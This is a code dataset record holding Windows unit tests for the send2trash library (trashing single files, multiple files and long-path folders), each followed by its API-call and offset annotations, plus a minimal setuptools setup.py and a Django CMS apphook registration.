@unittest.skipIf(sys.platform != "win32", "Windows only")
class TestNormal(unittest.TestCase):
def setUp(self):
self.dirname = "\\\\?\\" + op.join(gettempdir(), "python.send2trash")
self.file = op.join(self.dirname, "testfile.txt")
self._create_tree(self.file)
self.files = [
op.join(self.dirname, "testfile{}.txt".format(index)) for index in range(10)
]
[self._create_tree(file) for file in self.files]
def tearDown(self):
shutil.rmtree(self.dirname, ignore_errors=True)
def _create_tree(self, path):
dirname = op.dirname(path)
if not op.isdir(dirname):
os.makedirs(dirname)
with open(path, "w") as writer:
writer.write("send2trash test")
def _trash_file(self, fcn):
fcn(self.file)
self.assertFalse(op.exists(self.file))
def _trash_multifile(self, fcn):
fcn(self.files)
self.assertFalse(any([op.exists(file) for file in self.files]))
def _file_not_found(self, fcn):
file = op.join(self.dirname, "otherfile.txt")
self.assertRaises(WindowsError, fcn, file)
def test_trash_file(self):
self._trash_file(s2t)
def test_trash_multifile(self):
self._trash_multifile(s2t)
def test_file_not_found(self):
self._file_not_found(s2t)
def test_trash_file_modern(self):
self._trash_file(s2t_modern)
def test_trash_multifile_modern(self):
self._trash_multifile(s2t_modern)
def test_file_not_found_modern(self):
self._file_not_found(s2t_modern)
def test_trash_file_legacy(self):
self._trash_file(s2t_legacy)
def test_trash_multifile_legacy(self):
self._trash_multifile(s2t_legacy)
def test_file_not_found_legacy(self):
self._file_not_found(s2t_legacy)
@unittest.skipIf(sys.platform != "win32", "Windows only")
class TestLongPath(unittest.TestCase):
def setUp(self):
self.functions = {s2t: "auto", s2t_legacy: "legacy", s2t_modern: "modern"}
filename = "A" * 100
self.dirname = "\\\\?\\" + op.join(gettempdir(), filename)
path = op.join(
self.dirname,
filename,
filename, # From there, the path is not trashable from Explorer
filename,
filename + "{}.txt",
)
self.file = path.format("")
self._create_tree(self.file)
self.files = [path.format(index) for index in range(10)]
[self._create_tree(file) for file in self.files]
def tearDown(self):
shutil.rmtree(self.dirname, ignore_errors=True)
def _create_tree(self, path):
dirname = op.dirname(path)
if not op.isdir(dirname):
os.makedirs(dirname)
with open(path, "w") as writer:
writer.write("Looong filename!")
def _trash_file(self, fcn):
fcn(self.file)
self.assertFalse(op.exists(self.file))
def _trash_multifile(self, fcn):
fcn(self.files)
self.assertFalse(any([op.exists(file) for file in self.files]))
def _trash_folder(self, fcn):
fcn(self.dirname)
self.assertFalse(op.exists(self.dirname))
def test_trash_file(self):
self._trash_file(s2t)
def test_trash_multifile(self):
self._trash_multifile(s2t)
@unittest.skipIf(
op.splitdrive(os.getcwd())[0] != op.splitdrive(gettempdir())[0],
"Cannot trash long path from other drive",
)
def test_trash_folder(self):
self._trash_folder(s2t)
def test_trash_file_modern(self):
self._trash_file(s2t_modern)
def test_trash_multifile_modern(self):
self._trash_multifile(s2t_modern)
@unittest.skipIf(
op.splitdrive(os.getcwd())[0] != op.splitdrive(gettempdir())[0],
"Cannot trash long path from other drive",
)
def test_trash_folder_modern(self):
self._trash_folder(s2t_modern)
def test_trash_file_legacy(self):
self._trash_file(s2t_legacy)
def test_trash_multifile_legacy(self):
self._trash_multifile(s2t_legacy)
@unittest.skipIf(
op.splitdrive(os.getcwd())[0] != op.splitdrive(gettempdir())[0],
"Cannot trash long path from other drive",
)
def test_trash_folder_legacy(self):
self._trash_folder(s2t_legacy)
| [
"os.path.exists",
"os.makedirs",
"unittest.skipIf",
"os.path.join",
"os.getcwd",
"os.path.dirname",
"os.path.isdir",
"tempfile.gettempdir",
"shutil.rmtree"
] | [((360, 416), 'unittest.skipIf', 'unittest.skipIf', (["(sys.platform != 'win32')", '"""Windows only"""'], {}), "(sys.platform != 'win32', 'Windows only')\n", (375, 416), False, 'import unittest\n'), ((2207, 2263), 'unittest.skipIf', 'unittest.skipIf', (["(sys.platform != 'win32')", '"""Windows only"""'], {}), "(sys.platform != 'win32', 'Windows only')\n", (2222, 2263), False, 'import unittest\n'), ((573, 610), 'os.path.join', 'op.join', (['self.dirname', '"""testfile.txt"""'], {}), "(self.dirname, 'testfile.txt')\n", (580, 610), True, 'from os import path as op\n'), ((860, 907), 'shutil.rmtree', 'shutil.rmtree', (['self.dirname'], {'ignore_errors': '(True)'}), '(self.dirname, ignore_errors=True)\n', (873, 907), False, 'import shutil\n'), ((961, 977), 'os.path.dirname', 'op.dirname', (['path'], {}), '(path)\n', (971, 977), True, 'from os import path as op\n'), ((1418, 1456), 'os.path.join', 'op.join', (['self.dirname', '"""otherfile.txt"""'], {}), "(self.dirname, 'otherfile.txt')\n", (1425, 1456), True, 'from os import path as op\n'), ((2518, 2590), 'os.path.join', 'op.join', (['self.dirname', 'filename', 'filename', 'filename', "(filename + '{}.txt')"], {}), "(self.dirname, filename, filename, filename, filename + '{}.txt')\n", (2525, 2590), True, 'from os import path as op\n'), ((2945, 2992), 'shutil.rmtree', 'shutil.rmtree', (['self.dirname'], {'ignore_errors': '(True)'}), '(self.dirname, ignore_errors=True)\n', (2958, 2992), False, 'import shutil\n'), ((3046, 3062), 'os.path.dirname', 'op.dirname', (['path'], {}), '(path)\n', (3056, 3062), True, 'from os import path as op\n'), ((993, 1010), 'os.path.isdir', 'op.isdir', (['dirname'], {}), '(dirname)\n', (1001, 1010), True, 'from os import path as op\n'), ((1024, 1044), 'os.makedirs', 'os.makedirs', (['dirname'], {}), '(dirname)\n', (1035, 1044), False, 'import os\n'), ((1210, 1230), 'os.path.exists', 'op.exists', (['self.file'], {}), '(self.file)\n', (1219, 1230), True, 'from os import path as op\n'), ((3078, 3095), 'os.path.isdir', 'op.isdir', (['dirname'], {}), '(dirname)\n', (3086, 3095), True, 'from os import path as op\n'), ((3109, 3129), 'os.makedirs', 'os.makedirs', (['dirname'], {}), '(dirname)\n', (3120, 3129), False, 'import os\n'), ((3296, 3316), 'os.path.exists', 'op.exists', (['self.file'], {}), '(self.file)\n', (3305, 3316), True, 'from os import path as op\n'), ((3538, 3561), 'os.path.exists', 'op.exists', (['self.dirname'], {}), '(self.dirname)\n', (3547, 3561), True, 'from os import path as op\n'), ((518, 530), 'tempfile.gettempdir', 'gettempdir', ([], {}), '()\n', (528, 530), False, 'from tempfile import gettempdir\n'), ((2479, 2491), 'tempfile.gettempdir', 'gettempdir', ([], {}), '()\n', (2489, 2491), False, 'from tempfile import gettempdir\n'), ((1324, 1339), 'os.path.exists', 'op.exists', (['file'], {}), '(file)\n', (1333, 1339), True, 'from os import path as op\n'), ((3410, 3425), 'os.path.exists', 'op.exists', (['file'], {}), '(file)\n', (3419, 3425), True, 'from os import path as op\n'), ((3742, 3753), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3751, 3753), False, 'import os\n'), ((3775, 3787), 'tempfile.gettempdir', 'gettempdir', ([], {}), '()\n', (3785, 3787), False, 'from tempfile import gettempdir\n'), ((4122, 4133), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (4131, 4133), False, 'import os\n'), ((4155, 4167), 'tempfile.gettempdir', 'gettempdir', ([], {}), '()\n', (4165, 4167), False, 'from tempfile import gettempdir\n'), ((4516, 4527), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (4525, 4527), False, 'import os\n'), ((4549, 4561), 'tempfile.gettempdir', 'gettempdir', ([], {}), '()\n', (4559, 4561), False, 'from tempfile import gettempdir\n')] |
from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
description='POC model for publication',
author='<NAME>',
license='MIT',
)
| [
"setuptools.find_packages"
] | [((81, 96), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (94, 96), False, 'from setuptools import find_packages, setup\n')] |
from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
from django.utils.translation import ugettext_lazy as _
class StatsApphook(CMSApp):
name = _("Stats Apphook")
def get_urls(self, page=None, language=None, **kwargs):
return ["danceschool.stats.urls"] # replace this with the path to your application's URLs module
apphook_pool.register(StatsApphook)
| [
"cms.apphook_pool.apphook_pool.register",
"django.utils.translation.ugettext_lazy"
] | [((376, 411), 'cms.apphook_pool.apphook_pool.register', 'apphook_pool.register', (['StatsApphook'], {}), '(StatsApphook)\n', (397, 411), False, 'from cms.apphook_pool import apphook_pool\n'), ((177, 195), 'django.utils.translation.ugettext_lazy', '_', (['"""Stats Apphook"""'], {}), "('Stats Apphook')\n", (178, 195), True, 'from django.utils.translation import ugettext_lazy as _\n')] |